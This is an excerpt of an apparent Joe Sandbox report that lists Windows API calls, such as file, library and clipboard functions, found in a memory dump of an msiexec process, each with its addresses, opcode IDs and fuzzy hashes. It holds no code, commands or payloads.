                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                      • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                      • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                      • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                      • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                      • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                      • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                      APIs
                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@
                                                                      • String ID:
                                                                      • API String ID: 613200358-0
                                                                      • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                      • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                      • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                      • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                      APIs
                                                                      • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3664257935-0
                                                                      • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                      • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                      • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                      • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                      APIs
                                                                      • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: EnumNamesResource
                                                                      • String ID:
                                                                      • API String ID: 3334572018-0
                                                                      • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                      • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                      • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                      • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                      APIs
                                                                      • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3664257935-0
                                                                      • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                      • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                      • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                      • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                      APIs
                                                                      • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: CloseFind
                                                                      • String ID:
                                                                      • API String ID: 1863332320-0
                                                                      • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                      • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                      • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                      • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                      • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                      APIs
                                                                      • memset.MSVCRT ref: 004095FC
                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                        • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                        • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                      • String ID:
                                                                      • API String ID: 3655998216-0
                                                                      • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                      • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00445426
                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                      • String ID:
                                                                      • API String ID: 1828521557-0
                                                                      • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                      • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                      APIs
                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                        • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@FilePointermemcpy
                                                                      • String ID:
                                                                      • API String ID: 609303285-0
                                                                      • Opcode ID: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                      • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                      • Opcode Fuzzy Hash: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                      • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsicmp
                                                                      • String ID:
                                                                      • API String ID: 2081463915-0
                                                                      • Opcode ID: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                      • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                      • Opcode Fuzzy Hash: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                      • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                      APIs
                                                                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateErrorHandleLastRead
                                                                      • String ID:
                                                                      • API String ID: 2136311172-0
                                                                      • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                      • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                      • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                      • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                      APIs
                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@??3@
                                                                      • String ID:
                                                                      • API String ID: 1936579350-0
                                                                      • Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                      • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                      • Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                      • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: free
                                                                      • String ID:
                                                                      • API String ID: 1294909896-0
                                                                      • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                      • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                      • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                      • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: free
                                                                      • String ID:
                                                                      • API String ID: 1294909896-0
                                                                      • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                      • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                      • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                      • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: free
                                                                      • String ID:
                                                                      • API String ID: 1294909896-0
                                                                      • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                      • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                      • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                      • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                      APIs
                                                                      • EmptyClipboard.USER32 ref: 004098EC
                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                      • GetLastError.KERNEL32 ref: 0040995D
                                                                      • CloseHandle.KERNEL32(?), ref: 00409969
                                                                      • GetLastError.KERNEL32 ref: 00409974
                                                                      • CloseClipboard.USER32 ref: 0040997D
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                      • String ID:
                                                                      • API String ID: 3604893535-0
                                                                      • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                      • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                      • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                      • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                      • API String ID: 2780580303-317687271
                                                                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                      • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                      • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                      • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                      APIs
                                                                      • EmptyClipboard.USER32 ref: 00409882
                                                                      • wcslen.MSVCRT ref: 0040988F
                                                                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                      • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                      • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                      • CloseClipboard.USER32 ref: 004098D7
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                      • String ID:
                                                                      • API String ID: 1213725291-0
                                                                      • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                      • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                      • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                      • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                      APIs
                                                                      • GetLastError.KERNEL32 ref: 004182D7
                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                      • LocalFree.KERNEL32(?), ref: 00418342
                                                                      • free.MSVCRT ref: 00418370
                                                                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                      • String ID: OsError 0x%x (%u)
                                                                      • API String ID: 2360000266-2664311388
                                                                      • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                      • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                      • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                      • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                      APIs
                                                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                      • OpenClipboard.USER32(?), ref: 00411878
                                                                      • GetLastError.KERNEL32 ref: 0041188D
                                                                        • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                        • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                        • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                        • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                        • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                        • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                        • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                        • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                        • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                      • String ID:
                                                                      • API String ID: 2628231878-0
                                                                      • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                      • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                      • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                      • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@??3@memcpymemset
                                                                      • String ID:
                                                                      • API String ID: 1865533344-0
                                                                      • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                      • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
